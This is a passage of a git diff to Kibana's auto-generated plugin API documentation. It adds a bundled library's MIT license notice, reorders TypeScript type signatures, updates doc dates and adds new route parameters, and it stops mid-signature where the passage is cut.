@@ -253,6 +253,32 @@ WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. Portions of this code are licensed under the following license: For license information please see https://edge.fullstory.com/s/fs.js.LICENSE.txt +--- +This code includes a copy of the `normalize-path` +https://github.com/jonschlinkert/normalize-path/blob/52c3a95ebebc2d98c1ad7606cbafa7e658656899/index.js + +The MIT License (MIT) + +Copyright (c) 2014-2018, Jon Schlinkert. + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in +all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN +THE SOFTWARE. + --- This product bundles bootstrap@3.3.6 which is available under a "MIT" license. diff --git a/api_docs/actions.devdocs.json b/api_docs/actions.devdocs.json index 111add97bb0cf..615835f7b85a4 100644 --- a/api_docs/actions.devdocs.json +++ b/api_docs/actions.devdocs.json 
@@ -1580,7 +1580,7 @@ "label": "ActionParamsType", "description": [], "signature": [ - "{ readonly subAction: \"pushToService\"; readonly subActionParams: Readonly<{} & { incident: Readonly<{} & { title: string; description: string | null; tags: string[] | null; externalId: string | null; }>; comments: Readonly<{} & { comment: string; commentId: string; }>[] | null; }>; }" + "{ readonly subAction: \"pushToService\"; readonly subActionParams: Readonly<{} & { incident: Readonly<{} & { tags: string[] | null; title: string; description: string | null; externalId: string | null; }>; comments: Readonly<{} & { comment: string; commentId: string; }>[] | null; }>; }" ], "path": "x-pack/plugins/actions/server/builtin_action_types/cases_webhook/index.ts", "deprecated": false, @@ -1594,7 +1594,7 @@ "label": "ActionParamsType", "description": [], "signature": [ - "{ readonly to: string[]; readonly message: string; readonly subject: string; readonly cc: string[]; readonly bcc: string[]; readonly kibanaFooterLink: Readonly<{} & { path: string; text: string; }>; }" + "{ readonly message: string; readonly to: string[]; readonly subject: string; readonly cc: string[]; readonly bcc: string[]; readonly kibanaFooterLink: Readonly<{} & { path: string; text: string; }>; }" ], "path": "x-pack/plugins/actions/server/builtin_action_types/email.ts", "deprecated": false, 
@@ -1622,7 +1622,7 @@ "label": "ActionParamsType", "description": [], "signature": [ - "{ readonly group?: string | undefined; readonly source?: string | undefined; readonly summary?: string | undefined; readonly component?: string | undefined; readonly timestamp?: string | undefined; readonly eventAction?: \"resolve\" | \"trigger\" | \"acknowledge\" | undefined; readonly dedupKey?: string | undefined; readonly severity?: \"error\" | \"warning\" | \"info\" | \"critical\" | undefined; readonly class?: string | undefined; }" + "{ readonly source?: string | undefined; readonly summary?: string | undefined; readonly group?: string | undefined; readonly component?: string | undefined; readonly timestamp?: string | undefined; readonly eventAction?: \"resolve\" | \"trigger\" | \"acknowledge\" | undefined; readonly dedupKey?: string | undefined; readonly severity?: \"error\" | \"warning\" | \"info\" | \"critical\" | undefined; readonly class?: string | undefined; }" ], "path": "x-pack/plugins/actions/server/builtin_action_types/pagerduty.ts", "deprecated": false, 
@@ -1706,7 +1706,7 @@ "label": "ActionParamsType", "description": [], "signature": [ - "Readonly<{} & { subAction: \"getFields\"; subActionParams: Readonly<{} & {}>; }> | Readonly<{} & { subAction: \"getIncident\"; subActionParams: Readonly<{} & { externalId: string; }>; }> | Readonly<{} & { subAction: \"handshake\"; subActionParams: Readonly<{} & {}>; }> | Readonly<{} & { subAction: \"pushToService\"; subActionParams: Readonly<{} & { incident: Readonly<{} & { name: string; description: string | null; externalId: string | null; incidentTypes: number[] | null; severityCode: number | null; }>; comments: Readonly<{} & { comment: string; commentId: string; }>[] | null; }>; }> | Readonly<{} & { subAction: \"incidentTypes\"; subActionParams: Readonly<{} & {}>; }> | Readonly<{} & { subAction: \"severity\"; subActionParams: Readonly<{} & {}>; }>" + "Readonly<{} & { subAction: \"getFields\"; subActionParams: Readonly<{} & {}>; }> | Readonly<{} & { subAction: \"getIncident\"; subActionParams: Readonly<{} & { externalId: string; }>; }> | Readonly<{} & { subAction: \"handshake\"; subActionParams: Readonly<{} & {}>; }> | Readonly<{} & { subAction: \"pushToService\"; subActionParams: Readonly<{} & { incident: Readonly<{} & { description: string | null; name: string; externalId: string | null; incidentTypes: number[] | null; severityCode: number | null; }>; comments: Readonly<{} & { comment: string; commentId: string; }>[] | null; }>; }> | Readonly<{} & { subAction: \"incidentTypes\"; subActionParams: Readonly<{} & {}>; }> | Readonly<{} & { subAction: \"severity\"; subActionParams: Readonly<{} & {}>; }>" ], "path": "x-pack/plugins/actions/server/builtin_action_types/resilient/index.ts", "deprecated": false, 
@@ -1748,19 +1748,7 @@ "label": "ActionsClient", "description": [], "signature": [ - "{ execute: ({ actionId, params, source, relatedSavedObjects, }: Omit<", - "ExecuteOptions", - ", \"request\">) => Promise<", - { - "pluginId": "actions", - "scope": "common", - "docId": "kibActionsPluginApi", - "section": "def-common.ActionTypeExecutorResult", - "text": "ActionTypeExecutorResult" - }, - ">; create: ({ action: { actionTypeId, name, config, secrets }, }: ", - "CreateOptions", - ") => Promise<", + "{ get: ({ id }: { id: string; }) => Promise<", { "pluginId": "actions", "scope": "server", @@ -1770,7 +1758,9 @@ }, "<", "ActionTypeConfig", - ">>; get: ({ id }: { id: string; }) => Promise<", + ">>; delete: ({ id }: { id: string; }) => Promise<{}>; create: ({ action: { actionTypeId, name, config, secrets }, }: ", + "CreateOptions", + ") => Promise<", { "pluginId": "actions", "scope": "server", @@ -1792,7 +1782,17 @@ }, "<", "ActionTypeConfig", - ">>; delete: ({ id }: { id: string; }) => Promise<{}>; getAll: () => Promise<", + ">>; execute: ({ actionId, params, source, relatedSavedObjects, }: Omit<", + "ExecuteOptions", + ", \"request\">) => Promise<", + { + "pluginId": "actions", + "scope": "common", + "docId": "kibActionsPluginApi", + "section": "def-common.ActionTypeExecutorResult", + "text": "ActionTypeExecutorResult" + }, + ">; getAll: () => Promise<", { "pluginId": "actions", "scope": "server", 
@@ -1810,7 +1810,7 @@ }, "<", "ActionTypeConfig", - ">[]>; getOAuthAccessToken: ({ type, options }: Readonly<{} & { type: \"client\" | \"jwt\"; options: Readonly<{} & { config: Readonly<{} & { clientId: string; jwtKeyId: string; userIdentifierValue: string; }>; tokenUrl: string; secrets: Readonly<{ privateKeyPassword?: string | undefined; } & { clientSecret: string; privateKey: string; }>; }> | Readonly<{} & { scope: string; config: Readonly<{} & { clientId: string; tenantId: string; }>; tokenUrl: string; secrets: Readonly<{} & { clientSecret: string; }>; }>; }>, configurationUtilities: ", + ">[]>; getOAuthAccessToken: ({ type, options }: Readonly<{} & { options: Readonly<{} & { config: Readonly<{} & { clientId: string; jwtKeyId: string; userIdentifierValue: string; }>; tokenUrl: string; secrets: Readonly<{ privateKeyPassword?: string | undefined; } & { clientSecret: string; privateKey: string; }>; }> | Readonly<{} & { scope: string; config: Readonly<{} & { clientId: string; tenantId: string; }>; tokenUrl: string; secrets: Readonly<{} & { clientSecret: string; }>; }>; type: \"client\" | \"jwt\"; }>, configurationUtilities: ", "ActionsConfigurationUtilities", ") => Promise<{ accessToken: string | null; }>; enqueueExecution: (options: ", "ExecuteOptions", diff --git a/api_docs/actions.mdx b/api_docs/actions.mdx index b93b643e5cbcc..91d5459d66c06 100644 --- a/api_docs/actions.mdx +++ b/api_docs/actions.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/actions title: "actions" image: https://source.unsplash.com/400x175/?github description: API docs for the actions plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'actions'] --- import actionsObj from './actions.devdocs.json'; diff --git a/api_docs/advanced_settings.mdx b/api_docs/advanced_settings.mdx index f16942c36b58f..eab29bf01da57 100644 --- a/api_docs/advanced_settings.mdx +++ b/api_docs/advanced_settings.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/advancedSettings title: "advancedSettings" image: https://source.unsplash.com/400x175/?github description: API docs for the advancedSettings plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'advancedSettings'] --- import advancedSettingsObj from './advanced_settings.devdocs.json'; diff --git a/api_docs/aiops.mdx b/api_docs/aiops.mdx index 5061bd1c674ed..56197bdc37640 100644 --- a/api_docs/aiops.mdx +++ b/api_docs/aiops.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/aiops title: "aiops" image: https://source.unsplash.com/400x175/?github description: API docs for the aiops plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'aiops'] --- import aiopsObj from './aiops.devdocs.json'; diff --git a/api_docs/alerting.devdocs.json b/api_docs/alerting.devdocs.json index 37286b87f391e..a71cca2e3d278 100644 --- a/api_docs/alerting.devdocs.json +++ b/api_docs/alerting.devdocs.json @@ -43,7 +43,7 @@ "The rule to view" ], "signature": [ - "{ id: string; name: string; monitoring?: ", + "{ params: never; tags: string[]; id: string; monitoring?: ", { "pluginId": "alerting", "scope": "common", @@ -51,7 +51,7 @@ "section": "def-common.RuleMonitoring", "text": "RuleMonitoring" }, - " | undefined; tags: string[]; enabled: boolean; params: never; actions: ", + " | undefined; name: string; enabled: boolean; actions: ", { "pluginId": "alerting", "scope": "common", 
@@ -1732,7 +1732,7 @@ "section": "def-common.SanitizedRule", "text": "SanitizedRule" }, - ", \"name\" | \"tags\" | \"enabled\" | \"actions\" | \"throttle\" | \"consumer\" | \"schedule\" | \"createdBy\" | \"updatedBy\" | \"createdAt\" | \"updatedAt\" | \"notifyWhen\"> & { producer: string; ruleTypeId: string; ruleTypeName: string; }" + ", \"tags\" | \"name\" | \"enabled\" | \"actions\" | \"throttle\" | \"consumer\" | \"schedule\" | \"createdBy\" | \"updatedBy\" | \"createdAt\" | \"updatedAt\" | \"notifyWhen\"> & { producer: string; ruleTypeId: string; ruleTypeName: string; }" ], "path": "x-pack/plugins/alerting/server/types.ts", "deprecated": false @@ -1912,7 +1912,7 @@ "section": "def-server.PublicAlert", "text": "PublicAlert" }, - "; done: () => ", + "; hasReachedAlertLimit: () => boolean; done: () => ", "AlertFactoryDoneUtils", "; }" ], @@ -2396,7 +2396,7 @@ "label": "AlertingRulesConfig", "description": [], "signature": [ - "Pick[] | undefined; } & { actions: Readonly<{ connectorTypeOverrides?: Readonly<{ max?: number | undefined; } & { id: string; }>[] | undefined; } & { max: number; }>; }>; minimumScheduleInterval: Readonly<{} & { value: string; enforce: boolean; }>; }>, \"minimumScheduleInterval\"> & { isUsingSecurity: boolean; }" + "Pick[] | undefined; } & { actions: Readonly<{ connectorTypeOverrides?: Readonly<{ max?: number | undefined; } & { id: string; }>[] | undefined; } & { max: number; }>; alerts: Readonly<{} & { max: number; }>; }>; minimumScheduleInterval: Readonly<{} & { value: string; enforce: boolean; }>; }>, \"minimumScheduleInterval\"> & { isUsingSecurity: boolean; }" ], "path": "x-pack/plugins/alerting/server/config.ts", "deprecated": false, 
@@ -2569,7 +2569,25 @@ "label": "RulesClient", "description": [], "signature": [ - "{ aggregate: ({ options: { fields, filter, ...options }, }?: { options?: ", + "{ get: ({ id, includeLegacyId, includeSnoozeData, excludeFromPublicApi, }: { id: string; includeLegacyId?: boolean | undefined; includeSnoozeData?: boolean | undefined; excludeFromPublicApi?: boolean | undefined; }) => Promise<", + { + "pluginId": "alerting", + "scope": "common", + "docId": "kibAlertingPluginApi", + "section": "def-common.SanitizedRule", + "text": "SanitizedRule" + }, + " | ", + "SanitizedRuleWithLegacyId", + ">; delete: ({ id }: { id: string; }) => Promise<{}>; aggregate: ({ options: { fields, filter, ...options }, }?: { options?: ", "AggregateOptions", " | undefined; }) => Promise<", "AggregateResult", @@ -2609,24 +2627,6 @@ "section": "def-server.FindResult", "text": "FindResult" }, - ">; get: ({ id, includeLegacyId, includeSnoozeData, excludeFromPublicApi, }: { id: string; includeLegacyId?: boolean | undefined; includeSnoozeData?: boolean | undefined; excludeFromPublicApi?: boolean | undefined; }) => Promise<", - { - "pluginId": "alerting", - "scope": "common", - "docId": "kibAlertingPluginApi", - "section": "def-common.SanitizedRule", - "text": "SanitizedRule" - }, - " | ", - "SanitizedRuleWithLegacyId", ">; update: >; delete: ({ id }: { id: string; }) => Promise<{}>; resolve: >; resolve: , \"name\" | \"tags\" | \"enabled\" | \"actions\" | \"throttle\" | \"consumer\" | \"schedule\" | \"createdBy\" | \"updatedBy\" | \"createdAt\" | \"updatedAt\" | \"notifyWhen\"> & { producer: string; ruleTypeId: string; ruleTypeName: string; }" + ", \"tags\" | \"name\" | \"enabled\" | \"actions\" | \"throttle\" | \"consumer\" | \"schedule\" | \"createdBy\" | \"updatedBy\" | \"createdAt\" | \"updatedAt\" | \"notifyWhen\"> & { producer: string; ruleTypeId: string; ruleTypeName: string; }" ], "path": "x-pack/plugins/alerting/common/rule.ts", "deprecated": false, 
diff --git a/api_docs/alerting.mdx b/api_docs/alerting.mdx index d69bdafe73253..395e0c140beba 100644 --- a/api_docs/alerting.mdx +++ b/api_docs/alerting.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/alerting title: "alerting" image: https://source.unsplash.com/400x175/?github description: API docs for the alerting plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'alerting'] --- import alertingObj from './alerting.devdocs.json'; diff --git a/api_docs/apm.mdx b/api_docs/apm.mdx index fdd21d0dcfdfb..9b8b97f4e1acd 100644 --- a/api_docs/apm.mdx +++ b/api_docs/apm.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/apm title: "apm" image: https://source.unsplash.com/400x175/?github description: API docs for the apm plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'apm'] --- import apmObj from './apm.devdocs.json'; diff --git a/api_docs/banners.mdx b/api_docs/banners.mdx index c9eb19f741964..c0c2246c4eb76 100644 --- a/api_docs/banners.mdx +++ b/api_docs/banners.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/banners title: "banners" image: https://source.unsplash.com/400x175/?github description: API docs for the banners plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'banners'] --- import bannersObj from './banners.devdocs.json'; diff --git a/api_docs/bfetch.devdocs.json b/api_docs/bfetch.devdocs.json index a237342580ae8..fb3b44c609fd3 100644 --- a/api_docs/bfetch.devdocs.json +++ b/api_docs/bfetch.devdocs.json @@ -338,7 +338,15 @@ "signature": [ "(path: string, params: (request: ", "KibanaRequest", - ") => ", + ", context: ", + { + "pluginId": "core", + "scope": "server", + "docId": "kibCorePluginApi", + "section": "def-server.RequestHandlerContext", + "text": "RequestHandlerContext" + }, + ") => ", { "pluginId": "bfetch", "scope": "common", 
@@ -346,7 +354,17 @@ "section": "def-common.StreamingResponseHandler", "text": "StreamingResponseHandler" }, - ") => void" + ", method?: \"GET\" | \"POST\" | \"PUT\" | \"DELETE\" | undefined, pluginRouter?: ", + "IRouter", + "<", + { + "pluginId": "core", + "scope": "server", + "docId": "kibCorePluginApi", + "section": "def-server.RequestHandlerContext", + "text": "RequestHandlerContext" + }, + "> | undefined) => void" ], "path": "src/plugins/bfetch/server/plugin.ts", "deprecated": false, @@ -375,7 +393,15 @@ "signature": [ "(request: ", "KibanaRequest", - ") => ", + ", context: ", + { + "pluginId": "core", + "scope": "server", + "docId": "kibCorePluginApi", + "section": "def-server.RequestHandlerContext", + "text": "RequestHandlerContext" + }, + ") => ", { "pluginId": "bfetch", "scope": "common", @@ -388,6 +414,43 @@ "path": "src/plugins/bfetch/server/plugin.ts", "deprecated": false, "isRequired": true + }, + { + "parentPluginId": "bfetch", + "id": "def-server.BfetchServerSetup.addStreamingResponseRoute.$3", + "type": "CompoundType", + "tags": [], + "label": "method", + "description": [], + "signature": [ + "\"GET\" | \"POST\" | \"PUT\" | \"DELETE\" | undefined" + ], + "path": "src/plugins/bfetch/server/plugin.ts", + "deprecated": false, + "isRequired": false + }, + { + "parentPluginId": "bfetch", + "id": "def-server.BfetchServerSetup.addStreamingResponseRoute.$4", + "type": "Object", + "tags": [], + "label": "pluginRouter", + "description": [], + "signature": [ + "IRouter", + "<", + { + "pluginId": "core", + "scope": "server", + "docId": "kibCorePluginApi", + "section": "def-server.RequestHandlerContext", + "text": "RequestHandlerContext" + }, + "> | undefined" + ], + "path": "src/plugins/bfetch/server/plugin.ts", + "deprecated": false, + "isRequired": false } ], "returnComment": [] diff --git a/api_docs/bfetch.mdx b/api_docs/bfetch.mdx index d086f3856107b..dd05defadd370 100644 --- a/api_docs/bfetch.mdx +++ b/api_docs/bfetch.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/bfetch title: "bfetch" image: https://source.unsplash.com/400x175/?github description: API docs for the bfetch plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'bfetch'] --- import bfetchObj from './bfetch.devdocs.json'; @@ -21,7 +21,7 @@ Contact [App Services](https://github.com/orgs/elastic/teams/kibana-app-services | Public API count | Any count | Items lacking comments | Missing exports | |-------------------|-----------|------------------------|-----------------| -| 78 | 1 | 69 | 2 | +| 80 | 1 | 71 | 2 | ## Client diff --git a/api_docs/canvas.mdx b/api_docs/canvas.mdx index cd388ad778381..84d0ab053f01a 100644 --- a/api_docs/canvas.mdx +++ b/api_docs/canvas.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/canvas title: "canvas" image: https://source.unsplash.com/400x175/?github description: API docs for the canvas plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'canvas'] --- import canvasObj from './canvas.devdocs.json'; diff --git a/api_docs/cases.mdx b/api_docs/cases.mdx index d5c62b53726b0..8c8fc918c9b18 100644 --- a/api_docs/cases.mdx +++ b/api_docs/cases.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/cases title: "cases" image: https://source.unsplash.com/400x175/?github description: API docs for the cases plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'cases'] --- import casesObj from './cases.devdocs.json'; diff --git a/api_docs/charts.mdx b/api_docs/charts.mdx index bfa9dfe5d995d..879d3fd2ce32a 100644 --- a/api_docs/charts.mdx +++ b/api_docs/charts.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/charts title: "charts" image: https://source.unsplash.com/400x175/?github description: API docs for the charts plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'charts'] --- import chartsObj from './charts.devdocs.json'; 
diff --git a/api_docs/cloud.mdx b/api_docs/cloud.mdx index 9e12ef3d4b2dd..b19cbe910b3f7 100644 --- a/api_docs/cloud.mdx +++ b/api_docs/cloud.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/cloud title: "cloud" image: https://source.unsplash.com/400x175/?github description: API docs for the cloud plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'cloud'] --- import cloudObj from './cloud.devdocs.json'; diff --git a/api_docs/cloud_security_posture.mdx b/api_docs/cloud_security_posture.mdx index a00eac130bb5e..6d2856179de5c 100644 --- a/api_docs/cloud_security_posture.mdx +++ b/api_docs/cloud_security_posture.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/cloudSecurityPosture title: "cloudSecurityPosture" image: https://source.unsplash.com/400x175/?github description: API docs for the cloudSecurityPosture plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'cloudSecurityPosture'] --- import cloudSecurityPostureObj from './cloud_security_posture.devdocs.json'; diff --git a/api_docs/console.mdx b/api_docs/console.mdx index 9c89ffa115dcf..37339139f936f 100644 --- a/api_docs/console.mdx +++ b/api_docs/console.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/console title: "console" image: https://source.unsplash.com/400x175/?github description: API docs for the console plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'console'] --- import consoleObj from './console.devdocs.json'; diff --git a/api_docs/controls.mdx b/api_docs/controls.mdx index fd6ed74379357..97c69c1387e57 100644 --- a/api_docs/controls.mdx +++ b/api_docs/controls.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/controls title: "controls" image: https://source.unsplash.com/400x175/?github description: API docs for the controls plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'controls'] --- import controlsObj from './controls.devdocs.json'; 
diff --git a/api_docs/core.devdocs.json b/api_docs/core.devdocs.json index caa8db405aef7..a4b351471464c 100644 --- a/api_docs/core.devdocs.json +++ b/api_docs/core.devdocs.json @@ -2530,12 +2530,12 @@ "id": "def-public.HttpFetchQuery.Unnamed", "type": "IndexSignature", "tags": [], - "label": "[key: string]: string | number | boolean | number[] | string[] | boolean[] | null | undefined", + "label": "[key: string]: string | number | boolean | string[] | number[] | boolean[] | null | undefined", "description": [ "\nTypeScript note: Technically we should use this interface instead, but @types/node uses the below stricter\ndefinition, so to avoid TypeScript errors, we'll restrict our version.\n\n[key: string]:\n | string\n | number\n | boolean\n | Array\n | undefined\n | null;" ], "signature": [ - "[key: string]: string | number | boolean | number[] | string[] | boolean[] | null | undefined" + "[key: string]: string | number | boolean | string[] | number[] | boolean[] | null | undefined" ], "path": "node_modules/@types/kbn__core-http-browser/index.d.ts", "deprecated": false @@ -5399,7 +5399,7 @@ "label": "size", "description": [], "signature": [ - "\"s\" | \"m\" | \"l\" | undefined" + "\"m\" | \"s\" | \"l\" | undefined" ], "path": "node_modules/@types/kbn__core-overlays-browser/index.d.ts", "deprecated": false @@ -9428,7 +9428,7 @@ "array of permitted values for this setting" ], "signature": [ - "number[] | string[] | undefined" + "string[] | number[] | undefined" ], "path": "node_modules/@types/kbn__core-ui-settings-common/index.d.ts", "deprecated": false 
@@ -9954,9 +9954,9 @@ "\nA sub-set of {@link UiSettingsParams} exposed to the client-side." ], "signature": [ - "{ metric?: { type: string; name: string; } | undefined; type?: ", + "{ options?: string[] | number[] | undefined; type?: ", "UiSettingsType", - " | undefined; name?: string | undefined; order?: number | undefined; value?: unknown; description?: string | undefined; options?: number[] | string[] | undefined; category?: string[] | undefined; optionLabels?: Record | undefined; requiresPageReload?: boolean | undefined; readonly?: boolean | undefined; sensitive?: boolean | undefined; deprecation?: ", + " | undefined; metric?: { type: string; name: string; } | undefined; value?: unknown; description?: string | undefined; name?: string | undefined; order?: number | undefined; category?: string[] | undefined; optionLabels?: Record | undefined; requiresPageReload?: boolean | undefined; readonly?: boolean | undefined; sensitive?: boolean | undefined; deprecation?: ", "DeprecationSettings", " | undefined; }" ], @@ -10025,9 +10025,9 @@ "label": "SavedObjectsFindOptions", "description": [], "signature": [ - "{ type: string | string[]; filter?: any; search?: string | undefined; page?: number | undefined; aggs?: Record | undefined; fields?: string[] | undefined; perPage?: number | undefined; sortField?: string | undefined; searchFields?: string[] | undefined; hasReference?: ", + "> | undefined; fields?: string[] | undefined; page?: number | undefined; perPage?: number | undefined; sortField?: string | undefined; searchFields?: string[] | undefined; hasReference?: ", "SavedObjectsFindOptionsReference", " | ", "SavedObjectsFindOptionsReference", 
@@ -10123,7 +10123,7 @@ "signature": [ "Pick<", "Toast", - ", \"children\" | \"color\" | \"className\" | \"lang\" | \"style\" | \"role\" | \"tabIndex\" | \"aria-activedescendant\" | \"aria-atomic\" | \"aria-autocomplete\" | \"aria-busy\" | \"aria-checked\" | \"aria-colcount\" | \"aria-colindex\" | \"aria-colspan\" | \"aria-controls\" | \"aria-current\" | \"aria-describedby\" | \"aria-details\" | \"aria-disabled\" | \"aria-dropeffect\" | \"aria-errormessage\" | \"aria-expanded\" | \"aria-flowto\" | \"aria-grabbed\" | \"aria-haspopup\" | \"aria-hidden\" | \"aria-invalid\" | \"aria-keyshortcuts\" | \"aria-label\" | \"aria-labelledby\" | \"aria-level\" | \"aria-live\" | \"aria-modal\" | \"aria-multiline\" | \"aria-multiselectable\" | \"aria-orientation\" | \"aria-owns\" | \"aria-placeholder\" | \"aria-posinset\" | \"aria-pressed\" | \"aria-readonly\" | \"aria-relevant\" | \"aria-required\" | \"aria-roledescription\" | \"aria-rowcount\" | \"aria-rowindex\" | \"aria-rowspan\" | \"aria-selected\" | \"aria-setsize\" | \"aria-sort\" | \"aria-valuemax\" | \"aria-valuemin\" | \"aria-valuenow\" | \"aria-valuetext\" | \"dangerouslySetInnerHTML\" | \"onCopy\" | \"onCopyCapture\" | \"onCut\" | \"onCutCapture\" | \"onPaste\" | \"onPasteCapture\" | \"onCompositionEnd\" | \"onCompositionEndCapture\" | \"onCompositionStart\" | \"onCompositionStartCapture\" | \"onCompositionUpdate\" | \"onCompositionUpdateCapture\" | \"onFocus\" | \"onFocusCapture\" | \"onBlur\" | \"onBlurCapture\" | \"onChange\" | \"onChangeCapture\" | \"onBeforeInput\" | \"onBeforeInputCapture\" | \"onInput\" | \"onInputCapture\" | \"onReset\" | \"onResetCapture\" | \"onSubmit\" | \"onSubmitCapture\" | \"onInvalid\" | \"onInvalidCapture\" | \"onLoad\" | \"onLoadCapture\" | \"onError\" | \"onErrorCapture\" | \"onKeyDown\" | \"onKeyDownCapture\" | \"onKeyPress\" | \"onKeyPressCapture\" | \"onKeyUp\" | \"onKeyUpCapture\" | \"onAbort\" | \"onAbortCapture\" | \"onCanPlay\" | \"onCanPlayCapture\" | \"onCanPlayThrough\" | 
\"onCanPlayThroughCapture\" | \"onDurationChange\" | \"onDurationChangeCapture\" | \"onEmptied\" | \"onEmptiedCapture\" | \"onEncrypted\" | \"onEncryptedCapture\" | \"onEnded\" | \"onEndedCapture\" | \"onLoadedData\" | \"onLoadedDataCapture\" | \"onLoadedMetadata\" | \"onLoadedMetadataCapture\" | \"onLoadStart\" | \"onLoadStartCapture\" | \"onPause\" | \"onPauseCapture\" | \"onPlay\" | \"onPlayCapture\" | \"onPlaying\" | \"onPlayingCapture\" | \"onProgress\" | \"onProgressCapture\" | \"onRateChange\" | \"onRateChangeCapture\" | \"onSeeked\" | \"onSeekedCapture\" | \"onSeeking\" | \"onSeekingCapture\" | \"onStalled\" | \"onStalledCapture\" | \"onSuspend\" | \"onSuspendCapture\" | \"onTimeUpdate\" | \"onTimeUpdateCapture\" | \"onVolumeChange\" | \"onVolumeChangeCapture\" | \"onWaiting\" | \"onWaitingCapture\" | \"onAuxClick\" | \"onAuxClickCapture\" | \"onClick\" | \"onClickCapture\" | \"onContextMenu\" | \"onContextMenuCapture\" | \"onDoubleClick\" | \"onDoubleClickCapture\" | \"onDrag\" | \"onDragCapture\" | \"onDragEnd\" | \"onDragEndCapture\" | \"onDragEnter\" | \"onDragEnterCapture\" | \"onDragExit\" | \"onDragExitCapture\" | \"onDragLeave\" | \"onDragLeaveCapture\" | \"onDragOver\" | \"onDragOverCapture\" | \"onDragStart\" | \"onDragStartCapture\" | \"onDrop\" | \"onDropCapture\" | \"onMouseDown\" | \"onMouseDownCapture\" | \"onMouseEnter\" | \"onMouseLeave\" | \"onMouseMove\" | \"onMouseMoveCapture\" | \"onMouseOut\" | \"onMouseOutCapture\" | \"onMouseOver\" | \"onMouseOverCapture\" | \"onMouseUp\" | \"onMouseUpCapture\" | \"onSelect\" | \"onSelectCapture\" | \"onTouchCancel\" | \"onTouchCancelCapture\" | \"onTouchEnd\" | \"onTouchEndCapture\" | \"onTouchMove\" | \"onTouchMoveCapture\" | \"onTouchStart\" | \"onTouchStartCapture\" | \"onPointerDown\" | \"onPointerDownCapture\" | \"onPointerMove\" | \"onPointerMoveCapture\" | \"onPointerUp\" | \"onPointerUpCapture\" | \"onPointerCancel\" | \"onPointerCancelCapture\" | \"onPointerEnter\" | 
\"onPointerEnterCapture\" | \"onPointerLeave\" | \"onPointerLeaveCapture\" | \"onPointerOver\" | \"onPointerOverCapture\" | \"onPointerOut\" | \"onPointerOutCapture\" | \"onGotPointerCapture\" | \"onGotPointerCaptureCapture\" | \"onLostPointerCapture\" | \"onLostPointerCaptureCapture\" | \"onScroll\" | \"onScrollCapture\" | \"onWheel\" | \"onWheelCapture\" | \"onAnimationStart\" | \"onAnimationStartCapture\" | \"onAnimationEnd\" | \"onAnimationEndCapture\" | \"onAnimationIteration\" | \"onAnimationIterationCapture\" | \"onTransitionEnd\" | \"onTransitionEndCapture\" | \"data-test-subj\" | \"hidden\" | \"security\" | \"defaultValue\" | \"defaultChecked\" | \"suppressContentEditableWarning\" | \"suppressHydrationWarning\" | \"accessKey\" | \"contentEditable\" | \"contextMenu\" | \"dir\" | \"draggable\" | \"placeholder\" | \"slot\" | \"spellCheck\" | \"translate\" | \"radioGroup\" | \"about\" | \"datatype\" | \"inlist\" | \"prefix\" | \"property\" | \"resource\" | \"typeof\" | \"vocab\" | \"autoCapitalize\" | \"autoCorrect\" | \"autoSave\" | \"itemProp\" | \"itemScope\" | \"itemType\" | \"itemID\" | \"itemRef\" | \"results\" | \"unselectable\" | \"inputMode\" | \"is\" | \"toastLifeTimeMs\" | 